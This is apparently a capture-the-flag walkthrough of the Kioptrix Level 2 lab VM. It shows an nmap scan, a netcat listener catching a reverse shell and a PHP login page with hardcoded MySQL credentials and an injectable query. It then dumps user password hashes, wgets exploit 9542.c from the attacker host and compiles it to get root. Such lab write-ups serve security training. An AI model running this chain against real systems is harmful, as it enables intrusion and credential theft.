Kioptrix Level 2
Infomation
Gathing Nmap
root@kali:~# nmap -p0-65535 192.168.1.8 -vv -A
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 23:57 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating ARP Ping Scan at 23:57
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 23:57, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating SYN Stealth Scan at 23:57
Scanning 192.168.1.8 [65536 ports]
Discovered open port 3306/tcp on 192.168.1.8
Discovered open port 22/tcp on 192.168.1.8
Discovered open port 80/tcp on 192.168.1.8
Discovered open port 111/tcp on 192.168.1.8
Discovered open port 443/tcp on 192.168.1.8
Discovered open port 631/tcp on 192.168.1.8
Discovered open port 742/tcp on 192.168.1.8
Completed SYN Stealth Scan at 23:57, 1.53s elapsed (65536 total ports)
Initiating Service scan at 23:57
Scanning 7 services on 192.168.1.8
Completed Service scan at 23:57, 14.05s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.8
NSE: Script scanning 192.168.1.8.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:58, 30.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
NSE Timing: About 98.44% done; ETC: 23:58 (0:00:00 remaining)
Completed NSE at 23:59, 60.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
Nmap scan report for 192.168.1.8
Host is up, received arp-response (0.00036s latency).
Scanned at 2019-12-06 23:57:39 PST for 107s
Not shown: 65529 closed ports
Reason: 65529 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOWJ2N2BPBPm0HxCi630ZxHtTNMh+uVkeYCkKVNxavZkcJdpfFTOGZp054sj27mVZVtCeNMHhzAUpvRisn/cH4k4plLd1m8HACAVPtcgRrshCzb7wzQikrP+byCVypE0RpkQcDya+ngDMVzrkA+9KQSR/5W6BjldLW60A5oZgyfvAAAAFQC/iRZe4LlaYXwHvYYDpjnoCPY3xQAAAIBKFGl/zr/u1JxCV8a9dIAMIE0rk0jYtwvpDCdBre450ruoLII/hsparzdJs898SMWX1kEzigzUdtobDVT8nWdJAVRHCm8ruy4IQYIdtjYowXD7hxZTy/F0xOsiTRWBYMQPe8lW1oA+xabqlnCO3ppjmBecVlCwEMoeefnwGWAkxwAAAIAKajcioQiMDYW7veV13Yjmag6wyIia9+V9aO8JmgMi3cNr04Vl0FF+n7OIZ5QYvpSKcQgRzwNylEW5juV0Xh96m2g3rqEvDd4kTttCDlOltPgP6q6Z8JI0IGzcIGYBy6UWdIxj9D7F2ccc7fAM2o22+qgFp+FFiLeFDVbRhYz4sg==
| 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
443/tcp open ssl/https? syn-ack ttl 64
|_ssl-date: 2019-12-07T05:48:44+00:00; -2h09m44s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
742/tcp open status syn-ack ttl 64 1 (RPC #100024)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/6%OT=22%CT=1%CU=41935%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5DEB5BDE%P=x86_64-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW2%O2=M5B4ST11NW2%O3=M5B4NNT11NW2%O4=M5B4ST11NW2%O5=
OS:M5B4ST11NW2%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW2%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.002 days (since Fri Dec 6 23:56:01 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: -2h09m44s
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.1.8
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.46 seconds
Raw packets sent: 65556 (2.885MB) | Rcvd: 65555 (2.623MB)
TRY 80 PORT
it executed.
in fact. i successed.
try reverse the shell
root@kali:~# nc -nvlp 64444
listening on [any] 64444 ...
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.8] 41528
bash: /usr/bin/bash: No such file or directory
root@kali:~# nc -nlp 64444
bash: /usr/bin/bash: No such file or directory
root@kali:~# nc -nlp 64444
whoami
apache
whoami
apache
whomai
/bin/sh: line 3: whomai: command not found
bash
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:53:19:4C
inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: 240d:1a:6af:1d00:20c:29ff:fe53:194c/64 Scope:Global
inet6 addr: fe80::20c:29ff:fe53:194c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1307413 errors:0 dropped:0 overruns:0 frame:0
TX packets:231059 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:89743636 (85.5 MiB) TX bytes:44175075 (42.1 MiB)
Interrupt:177 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:197 errors:0 dropped:0 overruns:0 frame:0
TX packets:197 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15318 (14.9 KiB) TX bytes:15318 (14.9 KiB)
FIND MYSQL PASSWORD
ls
index.php
pingit.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
}
?>
<html>
<body>
<?php
if ($row['id']==""){
?>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>
<?php
} //END of login form
?>
<!-- Start of HTML when logged in as Administator -->
<?php
if ($row['id']==1){
?>
<form name="ping" action="pingit.php" method="post" target="_blank">
<table width='600' border='1'>
<tr valign='middle'>
<td colspan='2' align='center'>
<b>Welcome to the Basic Administrative Web Console<br></b>
</td>
</tr>
<tr valign='middle'>
<td align='center'>
Ping a Machine on the Network:
</td>
<td align='center'>
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</td>
</td>
</tr>
</table>
</form>
<?php
}
?>
</body>
</html>
mysql -u john -p
Enter password: hiroshima
use mysql;
select * from user;
select user from user;
select * from user;
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Create_tmp_table_priv Lock_tables_priv Execute_priv Repl_slave_priv Repl_client_priv ssl_type ssl_cipher x509_issuer x509_subject max_questions max_updates max_connections
localhost root 5a6914ba69e02807 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y YY Y Y Y Y 0 0 0
localhost.localdomain root 5a6914ba69e02807 Y Y Y Y Y Y Y Y Y Y Y Y Y Y YY Y Y Y Y Y 0 0 0
localhost.localdomain N N N N N N N N N N N N N N N N NN N N N 0 0 0
localhost N N N N N N N N N N N N N N N N N NN N N 0 0 0
localhost john 5a6914ba69e02807 Y Y Y Y N N N N N N N N N N N NN N N N N 0 0 0
user
john
root
root
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Crea
id username password
1 admin 5afac8d85f
2 john 66lajGGbla
Use Eacalation Code
wget http://192.168.1.7/9542.c /tmp
--03:27:15-- http://192.168.1.7/9542.c
=> `9542.c'
Connecting to 192.168.1.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]
9542.c: Permission denied
Cannot write to `9542.c' (Permission denied).
/tmp: Unsupported scheme.
FINISHED --03:27:15--
Downloaded: 0 bytes in 0 files
ls -al
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
cd /tmp
ls
lib_mysqludf_sys.so
wget http://192.168.1.7/9542.c /tmp/
--03:28:02-- http://192.168.1.7/9542.c
=> `9542.c'
Connecting to 192.168.1.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]
0K .. 100% 93.35 MB/s
03:28:02 (93.35 MB/s) - `9542.c' saved [2643/2643]
/tmp/: Unsupported scheme.
FINISHED --03:28:02--
Downloaded: 2,643 bytes in 1 files
ls -al
total 40
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
gcc 9542.c
9542.c:109:28: warning: no newline at end of file
ls -al
total 48
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
-rwxr-xr-x 1 apache apache 6932 Dec 7 03:28 a.out
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
./a.out
sh: no job control in this shell
sh-3.00# ls -al
total 48
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
-rwxr-xr-x 1 apache apache 6932 Dec 7 03:28 a.out
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
sh-3.00# whoami
root
评论
发表评论